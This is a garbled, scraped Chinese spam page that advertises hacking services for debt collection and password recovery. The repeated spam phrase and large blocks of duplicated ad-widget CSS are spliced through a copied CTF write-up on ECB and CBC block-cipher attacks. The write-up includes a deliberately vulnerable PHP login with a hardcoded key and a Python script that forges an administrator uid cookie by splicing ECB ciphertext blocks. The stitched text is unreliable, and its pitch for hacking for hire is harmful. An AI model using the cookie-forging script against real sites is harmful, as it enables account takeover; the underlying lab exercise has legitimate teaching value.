技术专业诚实守信 *** 黑客帮助追债-普遍的Web密码学拒绝服务攻击归纳
分组密码的模式
分组密码每一次只有解决加密固定不动长短的分组,可是大家加密的明文很有可能会超出分组密码解决的长短。
这时候便必须对全部分组开展迭代更新,而迭代更新的 *** 被称作分组密码的模式。普遍的为对于ECB、CBC模式进攻(L-ctf提及在其中一种)。
ECB
ECB模式的全名是Electronic CodeBook模式,将明文分组加密后立即变成密文分组,而密文则是由明文分组立即拼凑而成,如下图所示:
.imageplus-append-lu-img-txt{
MARGIN: 10px 1080x; OVERFLOW: 求 *** 黑客帮我找回 *** 密码 hidden
}
.imageplus-append-nova-txt{
BOX-SIZING: border-box; BORDER-BOTTOM: #f2f2f2 1px solid; BORDER-LEFT: #f2f2f2 1px solid; LINE-HEIGHT: normal; FONT-FAMI *** : Microsoft YaHei; BORDER-TOP: #f2f2f2 1px solid; BORDER-RIGHT: #f2f2f2 1px solid
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item{
POSITION: relative; BACKGROUND-COLOR: #fff; WIDTH: 100%; HEIGHT: 50px
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item 求 *** 黑客帮我找回 *** 密码 A{
TEXT-DECORATION: none
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item A:hover{
TEXT-DECORATION: underline
}
.imageplus-append-nova-txt .imageplus-append-content 求 *** 黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item DIV{
LINE-HEIGHT: 25px; MARGIN: 1080x 16px; WIDTH: auto; TEXT-OVERFLOW: ellipsis; WHITE-SPACE: nowrap; HEIGHT: 25px; OVERFLOW: hidden; WORD-BREAK: keep-all; FONT-WEIGHT: normal
}
.imageplus-append-nova-txt 求 *** 黑客帮我找回 *** 密码 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title SPAN{
COLOR: #003397; FONT-SIZE: 14px; FONT-WEIGHT: bold
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item 求 *** 黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item-desc SPAN{
COLOR: #333; FONT-SIZE: 12px
}
.imageplus-append-jian{
BACKGROUND-IMAGE: url(http://ecmb.bdimg.com/public03/imageplus_m_append_jian_151204.png); POSITION: absolute; WIDTH: 20px; BACKGROUND-REPEAT: 求 *** 黑客帮我找回 *** 密码 no-repeat; BACKGROUND-POSITION: 1080x 1080x; HEIGHT: 20px; TOP: 1080x; LEFT: 1080x
}
.imageplus-append-close-btn{
BACKGROUND-IMAGE: url(http://ecmb.bdimg.com/public03/imageplus_m_append_close_btn_151113.png); POSITION: absolute; WIDTH: 40px; DISPLAY: none; 求 *** 黑客帮我找回 *** 密码 BACKGROUND-REPEAT: no-repeat; BACKGROUND-POSITION: 1080x 1080x; HEIGHT: 40px; TOP: 1080x; RIGHT: 1080x
}
.imageplus-append-logo{
POSITION: absolute; WIDTH: 18px; BOTTOM: 1080x; BACKGROUND: url(http://cpro.baidustatic.com/cpro/ui/noexpire/img/2.0.1/bg.png) 求 *** 黑客帮我找回 *** 密码 no-repeat left top; HEIGHT: 18px; RIGHT: 1080x
}
.imageplus-append-nova-txt-ue2{
BORDER-BOTTOM: #ddd 1px solid; BORDER-LEFT: #ddd 1px solid; BACKGROUND-COLOR: #f9f9f9; FONT-FAMI *** : Microsoft YaHei; FLOAT: left; BORDER-TOP: #ff2f62 3px solid; 求 *** 黑客帮我找回 *** 密码 BORDER-RIGHT: #ddd 1px solid
}
.imageplus-append-nova-txt-ue2 A:focus{
OUTLINE-STYLE: none; OUTLINE-COLOR: invert; OUTLINE-WIDTH: 1080x
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content{
FLOAT: left
}
.求 *** 黑客帮我找回 *** 密码imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item{
PADDING-BOTTOM: 5px; HEIGHT: 60px; MARGIN-LEFT: 44px; PADDING-TOP: 5px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-求 *** 黑客帮我找回 *** 密码txt-ad-item A{
TEXT-DECORATION: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item DIV{
TEXT-OVERFLOW: ellipsis; WHITE-SPACE: nowrap; OVERFLOW: hidden; WORD-BREAK: 求 *** 黑客帮我找回 *** 密码 keep-all
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title{
LINE-HEIGHT: 30px; HEIGHT: 30px; FONT-SIZE: 16px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content 求 *** 黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title A{
COLOR: #000
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title .imageplus-append-nova-txt-title-true 求 *** 黑客帮我找回 *** 密码{
FLOAT: left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title .imageplus-append-nova-txt-title-click{
WIDTH: 96px; FLOAT: 求 *** 黑客帮我找回 *** 密码 left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title .imageplus-append-nova-txt-title-click A{
COLOR: #ff2f62
}
.imageplus-append-nova-txt-ue2 求 *** 黑客帮我找回 *** 密码 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-desc{
LINE-HEIGHT: 26px; HEIGHT: 26px; FONT-SIZE: 12px
}{ X}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item-desc A {COLOR: #7b7b7b
}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn {
MARGIN-TOP: 19px; FLOAT: right; MARGIN-RIGHT: 18px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn A {
求黑客帮我找回 *** 密码
TEXT-DECORATION: none}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn DIV {
BORDER-BOTTOM: 0px; TEXT-ALIGN: center; BORDER-LEFT: 0px; LINE-HEIGHT: 32px; BACKGROUND-COLOR: #ff2f62; WIDTH: 100px; FONT-FAMI *** : Microsoft YaHei; HEIGHT: 求黑客帮我找回 *** 密码 32px; COLOR: #fff; FONT-SIZE: 16px; BORDER-TOP: 0px; CURSOR: pointer; BORDER-RIGHT: 0px; border-radius: 16px; -webkit-border-radius: 16px; -moz-border-radius: 16px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-jian {
BACKGROUND-IMAGE: 求黑客帮我找回 *** 密码 url(http://ecma.bdimg.com/public03/imageplus/append/nova_txt_star_160426.png); POSITION: absolute; WIDTH: 22px; BACKGROUND-REPEAT: no-repeat; BACKGROUND-POSITION: 0px 0px; HEIGHT: 40px; TOP: 3px; LEFT: 10px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-close-btn 求黑客帮我找回 *** 密码 {
DISPLAY: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-logo {
DISPLAY: none
}
.imageplus-append-nova-txt-ue2 .imageplus-baidu-logo {
Z-INDEX: 9999; POSITION: absolute; WIDTH: 16px; BOTTOM: 0px; 求黑客帮我找回 *** 密码 BACKGROUND: url(http://ecma.bdimg.com/public03/imageplus/logo.png) no-repeat 0px -17px; HEIGHT: 16px; RIGHT: 0px
}
.imageplus-append-nova-txt-ue2 .imageplus-ad-logo {
Z-INDEX: 12; POSITION: absolute; WIDTH: 34px; BOTTOM: 0px; BACKGROUND: url(http:/求黑客帮我找回 *** 密码/ecma.bdimg.com/public03/imageplus/logo.png) no-repeat 0px 0px; HEIGHT: 16px; OVERFLOW: hidden; LEFT: 0px
}
.imageplus-append {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: relative; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0求黑客帮我找回 *** 密码px; TEXT-INDENT: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline-block; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: hidden; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: 求黑客帮我找回 *** 密码 content-box
}
.imageplus-append DIV {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: 求黑客帮我找回 *** 密码 block; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: hidden; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append A 求黑客帮我找回 *** 密码 {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent 求黑客帮我找回 *** 密码 scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append IMG {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: 求黑客帮我找回 *** 密码 static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; 求黑客帮我找回 *** 密码 OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append SPAN {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 求黑客帮我找回 *** 密码 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; 求黑客帮我找回 *** 密码 PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
Features:
ECB模式是所有模式中最简单的一种。明文分组和密文分组是一一对应的,如果明文分组有相同的那么最后的密文中也会有相同的密文分组。
因为每个分组都独自进行加密解密,所以无需破解密文就能操纵部分明文,或者改变明文,在不知道加密算法的情况下得到密文,从而达到攻击效果,如图所示(翻转密文分组,那么明文分组求黑客帮我找回 *** 密码也会被翻转)
MARGIN: 10px 0px; 求黑客帮我找回 *** 密码 OVERFLOW: hidden
}
.imageplus-append-nova-txt {
BOX-SIZING: border-box; BORDER-BOTTOM: #f2f2f2 1px solid; BORDER-LEFT: #f2f2f2 1px solid; LINE-HEIGHT: normal; FONT-FAMI *** : Microsoft YaHei; BORDER-TOP: #f2f2f2 1px solid; BORDER-RIGHT: #f2f2f2 1px 求黑客帮我找回 *** 密码 solid
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item {
POSITION: relative; BACKGROUND-COLOR: #fff; WIDTH: 100%; HEIGHT: 50px
}
.imageplus-append-nova-txt .imageplus-append-content 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item A {
TEXT-DECORATION: none
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item A:hover {
TEXT-DECORATION: underline
}
.imageplus-append-nova-txt .imageplus-append-content 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item DIV {
LINE-HEIGHT: 25px; MARGIN: 0px 16px; WIDTH: auto; TEXT-OVERFLOW: ellipsis; WHITE-SPACE: nowrap; HEIGHT: 25px; OVERFLOW: hidden; WORD-BREAK: keep-all; FONT-WEIGHT: normal
}
.imageplus-append-nova-txt 求黑客帮我找回 *** 密码 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title SPAN {
COLOR: #003397; FONT-SIZE: 14px; FONT-WEIGHT: bold
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item-desc SPAN {
COLOR: #333; FONT-SIZE: 12px
}
.imageplus-append-jian {
BACKGROUND-IMAGE: url(http://ecmb.bdimg.com/public03/imageplus_m_append_jian_151204.png); POSITION: absolute; WIDTH: 20px; 求黑客帮我找回 *** 密码 BACKGROUND-REPEAT: no-repeat; BACKGROUND-POSITION: 0px 0px; HEIGHT: 20px; TOP: 0px; LEFT: 0px
}
.imageplus-append-close-btn {
BACKGROUND-IMAGE: url(http://ecmb.bdimg.com/public03/imageplus_m_append_close_btn_151113.png); POSITION: absolute; WIDTH: 求黑客帮我找回 *** 密码 40px; DISPLAY: none; BACKGROUND-REPEAT: no-repeat; BACKGROUND-POSITION: 0px 0px; HEIGHT: 40px; TOP: 0px; RIGHT: 0px
}
.imageplus-append-logo {
POSITION: absolute; WIDTH: 18px; BOTTOM: 0px; BACKGROUND: url(http://cpro.baidustatic.com/cpro/ui/noexpire/img/2.0.1/bg.png) 求黑客帮我找回 *** 密码 no-repeat left top; HEIGHT: 18px; RIGHT: 0px
}
.imageplus-append-nova-txt-ue2 {
BORDER-BOTTOM: #ddd 1px solid; BORDER-LEFT: #ddd 1px solid; BACKGROUND-COLOR: #f9f9f9; FONT-FAMI *** : Microsoft YaHei; FLOAT: left; BORDER-TOP: 求黑客帮我找回 *** 密码 #ff2f62 3px solid; BORDER-RIGHT: #ddd 1px solid
}
.imageplus-append-nova-txt-ue2 A:focus {
OUTLINE-STYLE: none; OUTLINE-COLOR: invert; OUTLINE-WIDTH: 0px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content {
FLOAT: 求黑客帮我找回 *** 密码 left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item {
PADDING-BOTTOM: 5px; HEIGHT: 60px; MARGIN-LEFT: 44px; PADDING-TOP: 5px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item A {
TEXT-DECORATION: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item DIV {
TEXT-OVERFLOW: ellipsis; WHITE-SPACE: nowrap; OVERFLOW: hidden; WORD-BREAK: 求黑客帮我找回 *** 密码 keep-all
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title {
LINE-HEIGHT: 30px; HEIGHT: 30px; FONT-SIZE: 16px
}
.imageplus-append-nova-txt-ue2 求黑客帮我找回 *** 密码 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title A {
COLOR: #000
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-title-true {
FLOAT: left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title .imageplus-append-nova-txt-title-click {
WIDTH: 96px; 求黑客帮我找回 *** 密码 FLOAT: left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title .imageplus-append-nova-txt-title-click A {
COLOR: #ff2f62
}
.imageplus-append-nova-txt-ue2 求黑客帮我找回 *** 密码 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-desc {
LINE-HEIGHT: 26px; HEIGHT: 26px; FONT-SIZE: 12px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item-desc A {
COLOR: #7b7b7b
}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn {
MARGIN-TOP: 19px; FLOAT: right; MARGIN-RIGHT: 18px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn 求黑客帮我找回 *** 密码 A {
TEXT-DECORATION: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn DIV {
BORDER-BOTTOM: 0px; TEXT-ALIGN: center; BORDER-LEFT: 0px; LINE-HEIGHT: 32px; BACKGROUND-COLOR: #ff2f62; WIDTH: 100px; FONT-FAMI *** : Microsoft 求黑客帮我找回 *** 密码 YaHei; HEIGHT: 32px; COLOR: #fff; FONT-SIZE: 16px; BORDER-TOP: 0px; CURSOR: pointer; BORDER-RIGHT: 0px; border-radius: 16px; -webkit-border-radius: 16px; -moz-border-radius: 16px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-jian {
BACKGROUND-IMAGE: 求黑客帮我找回 *** 密码 url(http://ecma.bdimg.com/public03/imageplus/append/nova_txt_star_160426.png); POSITION: absolute; WIDTH: 22px; BACKGROUND-REPEAT: no-repeat; BACKGROUND-POSITION: 0px 0px; HEIGHT: 40px; TOP: 3px; LEFT: 10px
}
.imageplus-append-nova-txt-ue2 求黑客帮我找回 *** 密码 .imageplus-append-close-btn {
DISPLAY: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-logo {
DISPLAY: none
}
.imageplus-append-nova-txt-ue2 .imageplus-baidu-logo {
Z-INDEX: 9999; POSITION: absolute; WIDTH: 16px; 求黑客帮我找回 *** 密码 BOTTOM: 0px; BACKGROUND: url(http://ecma.bdimg.com/public03/imageplus/logo.png) no-repeat 0px -17px; HEIGHT: 16px; RIGHT: 0px
}
.imageplus-append-nova-txt-ue2 .imageplus-ad-logo {
Z-INDEX: 12; POSITION: absolute; WIDTH: 34px; BOTTOM: 0px; 求黑客帮我找回 *** 密码 BACKGROUND: url(http://ecma.bdimg.com/public03/imageplus/logo.png) no-repeat 0px 0px; HEIGHT: 16px; OVERFLOW: hidden; LEFT: 0px
}
.imageplus-append {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: relative; TEXT-ALIGN: left; BORDER-LEFT: 0px;求黑客帮我找回 *** 密码 PADDING-BOTTOM: 0px; TEXT-INDENT: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline-block; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: hidden; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 求黑客帮我找回 *** 密码 0px; -webkit-box-sizing: content-box
}
.imageplus-append DIV {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 求黑客帮我找回 *** 密码 0px; DISPLAY: block; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: hidden; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append 求黑客帮我找回 *** 密码 A {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: 求黑客帮我找回 *** 密码 none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append IMG {
BOX-SIZING: content-box; BORDER-BOTTOM:求黑客帮我找回 *** 密码 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; 求黑客帮我找回 *** 密码 VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append SPAN {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; 求黑客帮我找回 *** 密码 PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; 求黑客帮我找回 *** 密码 BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
Example:
某次CTF遇到的题目
思路:以administrator权限登陆就就能获得Flag。判断权限则是根据cookie里面的uid参数,cookie包含username和uid两个参数,均为使用ECB加密的密文,然而username的密文是根据注册时的明文生成的。
因此我们可以根据username的明文操纵生成我们想要的uid的密文。经过fuzz发现明文分组块为16个字节,那么我们注册17字节的用户,多出的那一个字节就可以是我们我们希望的UID的值,而此时我们查看username的密文增加部分就是UID的密文,即可伪造UID。
注册aaaaaaaaaaaaaaaa1获得1的密文分组,注册aaaaaaaaaaaaaaaa2获得2的密文分组,以此类推
源码没找到,好像弄丢了,自己写了个差不多的,有兴趣可以练习
ebc.php:
function AES($data){
$privateKey = "1234567812345678123456求黑客帮我找回 *** 密码7812345678";
$encrypted = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $privateKey, $data, MCRYPT_MODE_ECB);
$encryptedData = (base64_encode($encrypted));
return $encryptedData;
}
function DE__AES($data){
$privateKey = "12345求黑客帮我找回 *** 密码678123456781234567812345678";
$encryptedData = base64_decode($data);
$decrypted = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $privateKey, $encryptedData, MCRYPT_MODE_ECB);
$decrypted = rtrim($decrypted, "\0") ;
return 求黑客帮我找回 *** 密码 $decrypted;
}
if (@$_GET['a']=='reg'){
setcookie('uid', AES('9'));
setcookie('username', AES($_POST['username']));
header("Location: http://127.0.0.1/ecb.php");
exit();
}
if (@!isset($_COOKIE['uid'])||@!isset($_COOKIE['username'])){
echo 求黑客帮我找回 *** 密码 '"post" action="ecb.php?a=reg">
Username:
"text" name="username">
Password:
"text" name="password" >
"submit" value="注册&求黑客帮我找回 *** 密码quot;>
';
}
else{
$uid = DE__AES($_COOKIE['uid']);
if ( $uid != '4'){
echo 'uid:' .$uid .'';
echo 'Hi ' . DE__AES($_COOKIE['username']) .'';
echo 'You are not administrotor!!';
}
else {
echo 求黑客帮我找回 *** 密码 "Hi you are administrotor!!" .'';
echo 'Flag is 360 become better';
}
}
?>
ecb.py:
#coding=utf-8
import urllib
import urllib2
import base64
import cookielib
import Cookie
求黑客帮我找回 *** 密码
for num in range(1,50):reg_url='http://127.0.0.1/ecb.php?a=reg'
index_url='http://127.0.0.1/ecb.php'
cookie=cookielib.CookieJar()
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
opener.addheaders.append(('User-Agent','Mozilla/5.0'))
num=str(num)
values={'username':'aaaaaaaaaaaaaaaa'+num,'password':'123'}
data=urllib.urlencode(values)
opener.open(reg_url,data)
text=opener.open(index_url,data)
for 求黑客帮我找回 *** 密码 ck in cookie:
if 求黑客帮我找回 *** 密码 ck.name=='username':
user_name=ck.value
user_name = urllib.unquote(user_name)
user_name = base64.b64decode(user_name)
hex_name = user_name.encode('hex')
hex_name = hex_name[len(hex_name)/2:]
hex_name = hex_name.decode('hex')
uid = 求黑客帮我找回 *** 密码 base64.b64encode(hex_name)
uid = urllib.quote(uid)
for ck in cookie:
if ck.name=='uid':
ck.value=uid
text=opener.open(index_url).read()
if 'Flag' in text:
print text
break
else:
print 求黑客帮我找回 *** 密码 num
CBC
CBC模式的全称是Cipher Block Chaining模式,在此模式中,先将明文分组与前一个密文分组(或为初始化向量IV)进行XOR运算,然后再进行加密。
解密则为密文分组先进行解密,然后再进行xor运算得到明文分组,解密过程如图所示(加密则相反)
MARGIN: 10px 0px; OVERFLOW: hidden
}
.imageplus-append-nova-txt {
BOX-SIZING: border-box; BORDER-BOTTOM: #f2f2f2 1px solid; 求黑客帮我找回 *** 密码 BORDER-LEFT: #f2f2f2 1px solid; LINE-HEIGHT: normal; FONT-FAMI *** : Microsoft YaHei; BORDER-TOP: #f2f2f2 1px solid; BORDER-RIGHT: #f2f2f2 1px solid
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item {
POSITION: 求黑客帮我找回 *** 密码 relative; BACKGROUND-COLOR: #fff; WIDTH: 100%; HEIGHT: 50px
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item A {
TEXT-DECORATION: none
}
.imageplus-append-nova-txt .imageplus-append-content 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item A:hover {
TEXT-DECORATION: underline
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item DIV {
LINE-HEIGHT: 25px; MARGIN: 0px 16px; WIDTH: auto; TEXT-OVERFLOW: ellipsis; 求黑客帮我找回 *** 密码 WHITE-SPACE: nowrap; HEIGHT: 25px; OVERFLOW: hidden; WORD-BREAK: keep-all; FONT-WEIGHT: normal
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title SPAN {
COLOR: #003求黑客帮我找回 *** 密码397; FONT-SIZE: 14px; FONT-WEIGHT: bold
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-desc SPAN {
COLOR: #333; FONT-SIZE: 12px
}
.imageplus-append-jian {求黑客帮我找回 *** 密码
BACKGROUND-IMAGE: url(http://ecmb.bdimg.com/public03/imageplus_m_append_jian_151204.png); POSITION: absolute; WIDTH: 20px; BACKGROUND-REPEAT: no-repeat; BACKGROUND-POSITION: 0px 0px; HEIGHT: 20px; TOP: 0px; LEFT: 0px
}
.imageplus-append-close-btn 求黑客帮我找回 *** 密码 {
BACKGROUND-IMAGE: url(http://ecmb.bdimg.com/public03/imageplus_m_append_close_btn_151113.png); POSITION: absolute; WIDTH: 40px; DISPLAY: none; BACKGROUND-REPEAT: no-repeat; BACKGROUND-POSITION: 0px 0px; HEIGHT: 40px; TOP: 0px; RIGHT: 0px
}
.imageplus-append-logo 求黑客帮我找回 *** 密码 {
POSITION: absolute; WIDTH: 18px; BOTTOM: 0px; BACKGROUND: url(http://cpro.baidustatic.com/cpro/ui/noexpire/img/2.0.1/bg.png) no-repeat left top; HEIGHT: 18px; RIGHT: 0px
}
.imageplus-append-nova-txt-ue2 {
BORDER-BOTTOM: 求黑客帮我找回 *** 密码 #ddd 1px solid; BORDER-LEFT: #ddd 1px solid; BACKGROUND-COLOR: #f9f9f9; FONT-FAMI *** : Microsoft YaHei; FLOAT: left; BORDER-TOP: #ff2f62 3px solid; BORDER-RIGHT: #ddd 1px solid
}
.imageplus-append-nova-txt-ue2 A:focus {
OUTLINE-STYLE: none; 求黑客帮我找回 *** 密码 OUTLINE-COLOR: invert; OUTLINE-WIDTH: 0px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content {
FLOAT: left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item {
PADDING-BOTTOM:求黑客帮我找回 *** 密码 5px; HEIGHT: 60px; MARGIN-LEFT: 44px; PADDING-TOP: 5px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item A {
TEXT-DECORATION: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item DIV {
TEXT-OVERFLOW: ellipsis; WHITE-SPACE: nowrap; OVERFLOW: hidden; WORD-BREAK: keep-all
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-求黑客帮我找回 *** 密码txt-ad-item-title {
LINE-HEIGHT: 30px; HEIGHT: 30px; FONT-SIZE: 16px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title A {
COLOR: 求黑客帮我找回 *** 密码 #000
}
